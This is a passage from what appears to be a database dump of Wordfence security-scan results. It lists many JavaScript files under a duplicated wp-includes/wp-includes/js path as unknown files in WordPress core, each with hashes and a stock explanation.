More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/twemoji.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34472,1631564708,1631564708,'new','knownfile',75,'703db5caf6e6ca83bf36d9b6a6e02b34','feff70237cc844074685c528926e259b','Unknown file in WordPress core: wp-includes/wp-includes/js/twemoji.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/twemoji.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34473,1631564708,1631564708,'new','knownfile',75,'15a4892f18553b89df26e2d902c83a4c','c7ed50dbe16a781b87b3ac07707ff131','Unknown file in WordPress core: wp-includes/wp-includes/js/underscore.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/underscore.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34474,1631564708,1631564708,'new','knownfile',75,'5fc1a0b9cbab9ddc88289ce5940bc10a','e1ad69b26fde01d37545166920d44dc7','Unknown file in WordPress core: wp-includes/wp-includes/js/underscore.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/underscore.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34475,1631564708,1631564708,'new','knownfile',75,'733efb2cf33d09850d9fbc447c41a5d8','e3dab25780acbbb83d864a6ac6173170','Unknown file in WordPress core: wp-includes/wp-includes/js/utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/js/utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34476,1631564708,1631564708,'new','knownfile',75,'c0df717d6f4db47628921fa6b8021856','b5173d5e013c1a63a6e763627709f124','Unknown file in WordPress core: wp-includes/wp-includes/js/utils.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/utils.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34477,1631564708,1631564708,'new','knownfile',75,'4de4ecd80563ddf57f6a3149d5f492b2','4446368b0338549bfe6d6feea10a3940','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-ajax-response.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/wp-ajax-response.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34478,1631564708,1631564708,'new','knownfile',75,'d0c38d8b0d4c34958e5c2b32514f3a7f','0fe887c80e94d328c165b9a62c825dbb','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-ajax-response.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-ajax-response.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34479,1631564708,1631564708,'new','knownfile',75,'dbf3474c65f0d84bc1623525651ffa3d','c9a5cd1c1869fa2309e41ed206e09734','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-api.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/js/wp-api.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34480,1631564708,1631564708,'new','knownfile',75,'544461b4e87e251d2271989834abd8bb','086b7a9df32dc56b3c93ef31a48855dd','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-api.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wp-api.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34481,1631564708,1631564708,'new','knownfile',75,'101ff5af1e4cbe1d84ce8b590bb799fb','837ab9a2205dcf6a347a465daf6c48d5','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-auth-check.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/wp-auth-check.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34482,1631564708,1631564708,'new','knownfile',75,'07d9deceb9afc49e7439aae14b780ae7','e307f6f70e63f765792d0d14cd3c9760','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-auth-check.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-auth-check.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34483,1631564708,1631564708,'new','knownfile',75,'cc59041e50093744299924d64c761cc4','bdde3d2cfdd894f8d64060efea6f6159','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-backbone.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-backbone.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34484,1631564708,1631564708,'new','knownfile',75,'6ceb203597ef1fad1555b521387fed6f','43455a6729d6a9a121cc55f86a431038','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-backbone.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-backbone.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34485,1631564708,1631564708,'new','knownfile',75,'a2a45574316f7e9a7963e1d97db9672a','bbe308fd432f07b4b397b3dce1c3e8de','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-custom-header.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/wp-custom-header.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34486,1631564708,1631564708,'new','knownfile',75,'236743e95b6a7df6deb06f4fc1cf2721','1369267d6c6c79563b016ddd295eb874','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-custom-header.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-custom-header.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34487,1631564708,1631564708,'new','knownfile',75,'26b84fa263d877625006559f504e9b5f','8c21c48addae4b464a830d3c3feda791','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed-template.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-embed-template.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34488,1631564708,1631564708,'new','knownfile',75,'f97f53cb7ba1b1002dc8ddaccd08b413','3e688d1f2390968adecf40142a9351bf','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed-template.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/wp-embed-template.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34489,1631564708,1631564708,'new','knownfile',75,'01553ab04975a27d4946e4965e27794c','0c77382e852ea603c99b2c8805a2d1e8','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-embed.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34490,1631564708,1631564708,'new','knownfile',75,'5611d41fb390afbdc0b719371e59ff9a','861b2b0750dcf210e46d6646dd13296d','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-embed.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34491,1631564708,1631564708,'new','knownfile',75,'756d1c42e40922b466ab812589cfb8e9','147f1b661c1687f718d6692bfd928004','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-loader.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-emoji-loader.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34492,1631564708,1631564708,'new','knownfile',75,'2a8b31f0a8473ee45f49dcf6be6471ab','95b52cff79495743f2dcc20e435348a4','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-loader.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/wp-emoji-loader.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34493,1631564708,1631564708,'new','knownfile',75,'d80757ab2d12753f267718bb0f11808d','cab1009c3f9152e2b635d4d0b4990cfb','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-release.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-emoji-release.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34494,1631564708,1631564708,'new','knownfile',75,'9c64678dbb8d2f86f63450232b5c7d82','65047d83bb81007c1f6589a11920d3db','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-emoji.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34495,1631564709,1631564709,'new','knownfile',75,'2c4267208692d7470d12f88b25399633','4ffc189aa86c697785cc5908f0f40394','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-emoji.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34496,1631564709,1631564709,'new','knownfile',75,'20c7278219bd4122e1234c960bda40cd','95403d9ab801a246a26707dadf76bc9f','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-list-revisions.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-list-revisions.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34497,1631564709,1631564709,'new','knownfile',75,'6435f8996875bdc2174996fde0eed364','f25cab857dff956a0a1e14b93441efcc','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-list-revisions.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/wp-list-revisions.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34498,1631564709,1631564709,'new','knownfile',75,'2a1badde098974df2770ee829054eebd','8f77c38ce173bd92e73c4c9c15810229','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-lists.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-lists.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34499,1631564709,1631564709,'new','knownfile',75,'62becb0a6403117eb2d378fd68ea8279','db34de383b965e08d4806cf0bac083d8','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-lists.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-lists.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34500,1631564709,1631564709,'new','knownfile',75,'5028abfd9a33efe3395848ab12341a25','cc59db16f747e3c940c14dae873bac69','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-pointer.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wp-pointer.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34501,1631564709,1631564709,'new','knownfile',75,'6718061c5a6d6ad535920740d5e5e273','2217218ecbe45d634d1bce345259ff3e','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-pointer.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/wp-pointer.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34502,1631564709,1631564709,'new','knownfile',75,'157fb2fb2e7a498ea5cad8ef5bbbe95a','df00c4c9dcb78a1c6878ecb51b5b2549','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-sanitize.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-sanitize.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34503,1631564709,1631564709,'new','knownfile',75,'daf667e650737df19d69cee9151bc665','84d7b8d3fbf9f675e9d8fb19f37e601f','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-sanitize.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-sanitize.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34504,1631564709,1631564709,'new','knownfile',75,'796d05a832abcdbe6f91b477df898286','3394fdacd7acacfa526d90f158bff504','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-util.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/wp-util.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34505,1631564709,1631564709,'new','knownfile',75,'fe07187ac8256d343a83e537935474ff','6a234ae29bb176c1059e863076fbfed9','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-util.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-util.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34506,1631564709,1631564709,'new','knownfile',75,'222120ecdafd0d55df272d1107096851','5c851f90fcb798403019e480c4ab40d8','Unknown file in WordPress core: wp-includes/wp-includes/js/wpdialog.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wpdialog.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34507,1631564709,1631564709,'new','knownfile',75,'06487584f27c3d1ba2e1aa7b41d64f48','e3d74a5d14685c5611b54724e1f1abd9','Unknown file in WordPress core: wp-includes/wp-includes/js/wpdialog.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wpdialog.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34508,1631564709,1631564709,'new','knownfile',75,'b435534457916751952eb889ec233437','361aaa3cef246f42153598ff308ae9c9','Unknown file in WordPress core: wp-includes/wp-includes/js/wplink.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/js/wplink.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34509,1631564709,1631564709,'new','knownfile',75,'f4021c299b8b2fcce58d756a57126265','4ac38834aed56f539acf3594c9f6b1c9','Unknown file in WordPress core: wp-includes/wp-includes/js/wplink.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wplink.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34510,1631564709,1631564709,'new','knownfile',75,'b79d13b910ba0085ee14c737103c557e','2c9b549943eba61edf6a340f661f65bc','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn-async.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/zxcvbn-async.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34511,1631564709,1631564709,'new','knownfile',75,'224e0835a1ee69b23f3fef63a2b4ad18','e4192fce595a7366b076542fe4579fca','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn-async.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/zxcvbn-async.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34512,1631564709,1631564709,'new','knownfile',75,'e439f19e2fb0d45671f15c6d0ba633fd','18e4923b0f764fcf37ca7434d78d7430','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous 